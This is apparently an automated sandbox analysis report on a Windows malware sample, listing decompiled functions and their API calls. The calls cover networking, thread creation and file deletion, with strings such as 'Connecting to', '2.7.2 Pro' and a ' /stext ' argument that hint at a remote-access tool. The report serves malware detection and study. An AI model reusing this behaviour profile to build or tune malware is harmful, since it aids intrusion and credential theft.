                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE77
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE87
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEA7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CEB7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEC7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CED7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEE7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEF7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF07
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF17
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF27
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF37
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF47
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF51
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004B), ref: 0040CF68
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF74
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF80
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF8C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF98
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFA4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFB0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFBC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFC8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFD4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFE0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFEC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFF8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D004
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D010
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D01C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D028
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D034
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D040
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D04C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D058
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D064
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D070
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D07C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D088
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D094
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0A0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0B8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0C4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0D0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0DC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0E8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0F4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D100
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D10C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D118
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D124
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D130
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D13C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D148
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D154
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D160
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D16C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D178
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D184
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D190
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D19C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1A8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1B4
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                                                                  • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                                                                  • Part of subcall function 00402149: #16.WS2_32(0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 00402186
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 0040219A
                                                                                  • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                                                                  • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                                                                  • Part of subcall function 00402149: ??3@YAXPAX@Z.MSVCRT(00000000,0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 004021DB
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 0040D20B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040D21F
                                                                                • CreateThread.KERNEL32(00000000,00000000,00411A24,00000000,00000000,00000000), ref: 0040D240
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D249
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D252
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D27E
                                                                                • atoi.MSVCRT ref: 0040D285
                                                                                • Sleep.KERNEL32(00000000), ref: 0040D293
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@V01@@$G@2@@std@@G@std@@$V10@$V01@$??4?$basic_string@$atoi$?length@?$basic_string@SleepV10@@$??3@?size@?$basic_string@CloseCountCreateG@1@@InfoLocaleOpenQueryThreadTickValueY?$basic_string@_itoamallocsprintf
                                                                                • String ID: %I64u$2.7.2 Pro$Connected to $Connecting to $Disconnected!$[INFO]$name
                                                                                • API String ID: 2846451457-2447509818
                                                                                • Opcode ID: 2451c82b7e56797327475265fa73bfe04b2c7fe1325af9a44618baad30109576
                                                                                • Instruction ID: 574894a8069dd40dccd63d7f1e28fe1214fcfdb2903245f54546a53b35e7f031
                                                                                • Opcode Fuzzy Hash: 2451c82b7e56797327475265fa73bfe04b2c7fe1325af9a44618baad30109576
                                                                                • Instruction Fuzzy Hash: 615244B2C0021DEBCB15BBA1EC49EDE777CEB54305F1081AAF416A3151EB745B89CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AE6A, Relevance: 173.7, APIs: 98, Strings: 1, Instructions: 485filesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                                                                  • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                                                                  • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                                                                  • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                                                                  • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                                                                  • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                                                                  • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                                                                  • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                                                                  • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                                                                  • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                                                                  • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                                                                • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 0040B1B6
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 0040B1E8
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 0040B211
                                                                                • Sleep.KERNELBASE(000001F4), ref: 0040B22A
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,0041B310,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B28B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B29B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?), ref: 0040B2B8
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000), ref: 0040B2C5
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040B2D2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
